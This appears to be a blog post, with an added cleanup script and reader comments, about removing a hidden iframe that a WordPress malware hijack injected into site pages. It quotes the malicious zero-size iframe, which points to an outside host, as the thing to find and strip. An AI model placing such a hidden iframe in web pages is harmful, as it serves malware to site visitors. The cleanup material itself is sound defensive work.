It seems that a new WordPress malware hijack is making the rounds and we got hit. Google just issued me a “this site contains malware” warning for my sites. After some quick investigation, it looks like the hijack has attached a malicious <iframe> block to the end of every HTML and PHP page in the site, so now I need to clean it out.
Luckily this is just like last time, and was easy to get rid of. I hope this tip helps someone else out as well.
This time, the iframe snippet that was getting added was:
<iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Luckily, I had my old script lying around that systematically searches through all my files and removes the offending piece of crap from them. You can use this command to do the same:
find . -type f -name '*.*' -exec sed -i 's/<iframe src="http:\/\/reycross\.com\/laso\/s\.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;
Hope this helps anybody else getting sacked by this attack. I think it has to do with a theme vulnerability.
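An audit-then-clean version of the one-liner above, as an added example that is not the post's own script: it lists the files carrying the injected iframe, saves a copy of each, strips the element, and re-checks. The function names, the backup directory and the demo files are assumptions constructed for illustration.

```sh
#!/bin/sh
# Added example (not the post's script). MARKER is the fixed start of the
# injected tag exactly as quoted in the post.
MARKER='<iframe src="http://reycross.com/laso/s.php"'

# list_infected DIR: print each file under DIR that contains the marker.
# -F treats the marker as a literal string, so no regex escaping is needed.
list_infected() {
    grep -rlF -- "$MARKER" "$1" 2>/dev/null
}

# clean_tree DIR BACKUP: save a copy of every infected file under BACKUP
# (keep it outside the web root), then remove the injected element.
# Writing through a temp file avoids `sed -i`, which GNU and BSD sed
# spell differently; `cat >` keeps the file's owner and mode.
clean_tree() {
    tmp=$(mktemp) || return 1
    list_infected "$1" | while IFS= read -r f; do
        # Skip the file rather than edit it if the backup copy fails.
        mkdir -p "$2/$(dirname "$f")" && cp -p "$f" "$2/$f" || continue
        sed 's|<iframe src="http://reycross\.com/laso/s\.php"[^>]*></iframe>||g' \
            "$f" > "$tmp" && cat "$tmp" > "$f"
    done
    rm -f "$tmp"
    # Exit status 0 only when nothing matching the marker is left.
    [ -z "$(list_infected "$1")" ]
}

# demo: build a constructed two-file site in a temp dir, audit, clean, re-audit.
demo() {
    site=$(mktemp -d) && bak=$(mktemp -d) || return 1
    bad='<iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'
    printf '<?php echo "hi"; ?>\n%s\n' "$bad" > "$site/index.php"
    printf '<html><body>clean</body></html>\n' > "$site/about.html"
    echo "before: $(list_infected "$site" | wc -l) infected"
    clean_tree "$site" "$bak"
    echo "after:  $(list_infected "$site" | wc -l) infected"
    rm -rf "$site" "$bak"
}
demo
```

Running list_infected on its own shows which files were touched before anything is changed, which also tells you where the injection landed.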

Hey, I’m having similar problems… my RSS feed link got infected too.
Any idea how to remove that too?
Also where and how do I include this text? [I'm not a tech guy]
find . -name ‘*.*’ -exec sed -i ‘s///g’ {} \;
Thank you
Codrut,
I’m not sure which part of WordPress generates the RSS feed content, so I’m not sure where to look to clear that out — but you execute that line of code I provided from a Unix/Linux command line from the root directory of where your WordPress install lives — it will scan *every* file looking for the pattern of the injected infected content and replace it with nothing — effectively removing it.
It should clean it out from wherever the RSS infection is taking place as well.
We seem to have been hit earlier – we discovered it in older posts only. And that accidentally by looking for an old post.
But this is helpful – seeing another variation on the problem.
JS
Jonathan, I hope you guys got everything cleaned out OK? If you run the command given anyway, it’s more or less a no-op if there are no matching hacked scripts, so it’s relatively harmless if you just wanted to run it to be safe. But if you already got things cleaned up then you should be OK.
Find and sed are Unix/Linux tools. Have you tested this in a terminal window on Mac OSX? What about MS Windows?
I’m sure this would help guests extremely. Will save your website for more updates! Thanks
Hey Admin, Sharing unique information is quite complicated and really you’ve done the complicated job. Thanks for sharing such amazing information.